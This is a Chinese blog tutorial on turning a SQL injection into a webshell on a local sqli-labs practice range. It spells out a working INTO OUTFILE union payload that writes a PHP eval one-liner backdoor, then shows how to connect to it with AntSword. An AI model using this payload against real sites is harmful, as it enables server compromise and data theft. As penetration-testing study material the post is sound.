渗透测试——基于SQL注入拿到webshell

news2024/12/25 6:27:54

作者名:Demo不是emo 

主页面链接:主页传送门
创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷
座右铭:不要让时代的悲哀成为你的悲哀
专研方向:网络安全,数据结构

每日emo:纵是告别,依旧意难平

 今天参加远程面试的时候面试官问了这样一个题:“你知道哪些通过注入漏洞获取服务器权限的方法?请详细讲讲,”这我直接愣住了,平时渗透中sql注入我一般用来获取数据库的数据信息,虽然在我记忆中我曾经学过通过注入漏洞获取服务器权限的方法,但已经忘得差不多了,所以今天写一篇博客来巩固一下这方面的知识,希望对您们也有帮助

目录

一:前提条件

(1)当前sql注入用户必须为DBA权限

(2)知道网站的绝对路径

(3)My.ini文件中的secure_file_priv为空 

二:原理讲解

三:实际操作 

1.通过sql注入漏洞写入文件到指定位置 

 2.使用webshell管理工具连接


一:前提条件

想要通过sql注入获取对方服务器权限,需要满足以下条件

(1)当前sql注入用户必须为DBA权限

--is-dba参数的值为true

很多小伙伴又会问道,那dba权限是什么呢?

DBA权限就其实是数据库的超级管理员权限

只有dba才能创建数据库结构

注意:一般数据库的dba权限都为root

(2)知道网站的绝对路径

知道网站的绝对路径主要是方便我们上传木马文件

不知道怎样找网站的绝对路径的也可以看看我的教程

文章链接:http://t.csdn.cn/Hmnfy

(3)My.ini文件中的secure_file_priv为空 

如下, 意思就是不限制数据的导入和导出操作

即能够上传木马文件 

二:原理讲解

 先简单给大家介绍一下流程

1.目标存在sql注入漏洞,且已经获取目标的绝对路径

2.并且通过探测发现目标能够进行数据的导入和导出操作,即secure_file_priv为空

3.当前数据库是最高权限(即dba权限)

4.利用Into outfile()   (写入文件的函数),向指定路径写入一句话木马

5.webshell连接工具连接一句话木马,成功获得权限

三:实际操作 

这里我们用大家熟知的sqli-labs靶场来给大家演示,如下

模拟环境:

1.已经知道目标存在sql注入,类型为union注入

2.通过各种方法已经获取到目标的绝对路径,为

D:\phpStudy\PHPTutorial\WWW\targetrange\sqli-labs-master\Less-1

3.通过sql注入获取用户名判断出是root用户,即dba权限 

页面如下

http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1

1.通过sql注入漏洞写入文件到指定位置 

代码如下: 

http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=-1' union select 1,'<?php @eval($_POST['cmd']);?>',3 into outfile 'D:\phpStudy\PHPTutorial\WWW\targetrange\sqli-labs-master\Less-1/ab.php' %23

 下面跟大家详细介绍一下这个命令的详细功能

http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=-1' union select 1,'<?php @eval($_POST["cmd"]);?>',3 into outfile 'D:/phpStudy/PHPTutorial/WWW/targetrange/sqli-labs-master/Less-1/ab.php' %23


select 1,'<?php @eval($_POST["cmd"]);?>',3
指定数据

into outfile 'D:/phpStudy/PHPTutorial/WWW/targetrange/sqli-labs-master/Less-1/ab.php' %23
将数据写入目标文件目录的ab.php文件

因为是靶场,所以我们可以先看看指定目录下的文件

可以看到里面只有一个php文件和txt文件,我们执行上面的命令,如下

 没有出现报错,说明已经成功写入了,再次查看该位置下的文件,如下

 可以确定,一句话木马已经被成功写入

 2.使用webshell管理工具连接

因为我平时用蚁剑比较多,这里就给大家用蚁剑演示了,首先打开蚁剑添加数据,输入我们刚才写入的文件的路径 ,密码为cmd

 再点击添加数据,页面如下

 可以看到已经成功获取了webshell,到这里就成功通过sqk注入拿到webshel了

重新测试了一遍发现其实还是挺简单的,只是平时获取webshell都老想着找文件上传漏洞去了,所以说大家还是得记住sql注入也是可以拿到webshell的哦,只是利用条件比较苛刻,最后,感谢大家的阅读,respect! 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/22076.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

spring整合struts2

因为最近工作的需要不得不学习struts2&#xff0c;整理了一下spring整合struts2的过程 需要详细了解struts2的朋友可以自行百度&#xff0c;这里只是简单的讲述如何使用 我是用的是idea进行项目构建的&#xff0c;eclipse的话可以自己百度一下 struts的官网&#xff1a;https:…

PTA题目 阶梯电价

为了提倡居民节约用电&#xff0c;某省电力公司执行“阶梯电价”&#xff0c;安装一户一表的居民用户电价分为两个“阶梯”&#xff1a;月用电量50千瓦时&#xff08;含50千瓦时&#xff09;以内的&#xff0c;电价为0.53元/千瓦时&#xff1b;超过50千瓦时的&#xff0c;超出部…

前缀和【一维前缀和与二维前缀和】

全文目录&#x1f600; 一维前缀和&#x1f914; 构建一维前缀和数组&#x1f635;‍&#x1f4ab; 子序列的和&#x1f600; 二维前缀和&#x1f914; 构建二维前缀和数组&#x1f635;‍&#x1f4ab; 子矩阵的和&#x1f600; 一维前缀和 一维前缀和很简单&#xff0c;就是…

[附源码]java毕业设计铁路法院数字档案管理系统

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…

[附源码]java毕业设计网上花店系统

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…

同步时序逻辑电路

分类 按逻辑功能不同分为&#xff1a;RS触发器、D触发器、JK触发器、T触发器。按触发方式不同分为&#xff1a;电平触发器、边沿触发器和脉冲触发器。按电路结构不同分为&#xff1a;基本RS触发器和钟控触发器。按存储数据原理不同分为&#xff1a;静态触发器和动态触发器。按…

【从零开始学微服务】03.软件架构的演化过程

大家好&#xff0c;欢迎来到万猫学社&#xff0c;跟我一起学&#xff0c;你也能成为微服务专家。 目前大部分的企业系统和互联网应用都是采用Web的形式提供服务能力&#xff0c;根据系统的组织方式和部署结构&#xff0c;我们通常把软件架构的演化过程分为以下几个阶段&#xf…

微信小程序实战,基于vue2实现瀑布流

1、什么是瀑布流呢&#xff1f; 瀑布流&#xff0c;又称瀑布流式布局。是比较流行的一种网站页面布局&#xff0c;视觉表现为参差不齐的多栏布局&#xff0c;随着页面滚动条向下滚动&#xff0c;这种布局还会不断加载数据块并附加至当前尾部。 瀑布流对于图片的展现&#xff0c…

HTML+CSS+JS大作业:生态环境网站设计——环境保护主题 大学生环保主题网页制

⛵ 源码获取 文末联系 ✈ Web前端开发技术 描述 网页设计题材&#xff0c;DIVCSS 布局制作,HTMLCSS网页设计期末课程大作业 | 环境保护 | 保护地球 | 校园环保 | 垃圾分类 | 绿色家园 | 等网站的设计与制作HTML期末大学生网页设计作业 HTML&#xff1a;结构 CSS&#xff1a;样…

【计算机编程基础】

计算机编程基础1 本节目标2 编程语言2.1 编程2.2 计算机语言2.3 编程语言2.4 翻译器2.5 编程语言和标记语言区别3 计算机基础3.1 计算机组成3.2 数据存储3.3 数据存储单位3.4 程序运行1 本节目标 说出什么是编程语言区分编程语言和标记语言的不同说出常见的数据存储单位及其换…

Maven入门学习——使用IDEA创建Maven文件的两种方式(内含配置setting文件)

使用IDEA创建Maven文件的两种方式一、前言二、前期准备&#xff08;配置setting文件&#xff09;1.修改文件放置位置2.改用阿里云镜像3.修改默认JDK版本三、构建Maven项目1.新建空项目2.设置项目中Maven版本3.新建模块4.配置模块5.测试四、使用插件创建Maven项目1.新建Maven项目…

Python字典制作“编码本”“密码本”,“试炼”加、解密文本操作

【点击此处跳转笔记正文】Python 官网&#xff1a;https://www.python.org/ Free&#xff1a;大咖免费“圣经”教程《 python 完全自学教程》&#xff0c;不仅仅是基础那么简单…… My CSDN主页、My HOT博、My Python 学习个人备忘录好文力荐、 老齐教室 自学并不是什么神秘的…

【k8s】2、二进制安装k8s

文章目录一、环境准备二、操作系统的初始化三、部署Etcd集群1、 准备cfssl证书生成工具2、生成etcd证书3、部署Etcd集群四、安装docker(所有node节点)五、部署master组件1、 准备证书2、 准备二进制文件、token3、 启动kube-apiserver服务4、启动scheduler服务5、启动controlle…

SpringBoot SpringBoot 开发实用篇 4 数据层解决方案 4.15 ES 文档操作

SpringBoot 【黑马程序员SpringBoot2全套视频教程&#xff0c;springboot零基础到项目实战&#xff08;spring boot2完整版&#xff09;】 SpringBoot 开发实用篇 文章目录SpringBootSpringBoot 开发实用篇4 数据层解决方案4.15 ES 文档操作4.15.1 文档操作4.15.2 小结4 数据…

最新最全面的Spring详解(四)——面向切面编程

前言 本文为 【Spring】面向切面编程 相关知识&#xff0c;下边将对AOP概述&#xff08;包含什么是AOP、AOP相关术语、Spring AOP通知类型&#xff09;&#xff0c;Spring AOP能力和目标&#xff0c;AOP代理&#xff0c;AspectJ风格的支持&#xff08;包含对于 AspectJ的支持、…

[附源码]java毕业设计图书馆自习室管理系统

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…

LIO-SAM

3D激光SLAM&#xff1a;位姿融合输出&#xff0c;LIO-SAM 提出了一个利用GT-SAM的紧耦合激光雷达惯导里程计的框架。实现了高精度、实时的移动机器人的轨迹估计和建图。这里主要讲解如何通过imu来进行位姿融合输出的。 LIO-SAM的全称是&#xff1a;Tightly-coupled Lidar Iner…

修复微信小程序不能获取头像和昵称的bug,微信小程序新版头像昵称API使用

导读&#xff1a; 大厂程序员都是有KPI绩效考核的&#xff0c;所以他们不能闲着&#xff0c;每天要想着怎么优化程序代码、怎么满足奇葩用户的需求&#xff0c;所以苦逼了我们这些小公司程序员&#xff0c;微信一个小小的API接口改动&#xff0c;可能就让一个小公司因此损失惨…

人工智能——大白话熟悉目标检测基本流程

&#x1f466;&#x1f466;一个帅气的boy&#xff0c;你可以叫我Love And Program &#x1f5b1; ⌨个人主页&#xff1a;Love And Program的个人主页 &#x1f496;&#x1f496;如果对你有帮助的话希望三连&#x1f4a8;&#x1f4a8;支持一下博主 大白话熟悉目标检测基本…

天然产物化合物库在肥胖中的潜在靶点 | MedChemExpress

脂肪有分类&#xff1f;都说“燃脂”&#xff0c;但很少有人了解脂肪组织。其实脂肪组织主要分为两类&#xff1a;白色脂肪组织 (WAT) 和棕色脂肪组织 (BAT)。白色脂肪以甘油三酯的形式储存多余的能量&#xff0c;而棕色脂肪则通过消耗能量产热&#xff0c;在保暖和抵抗肥胖中起…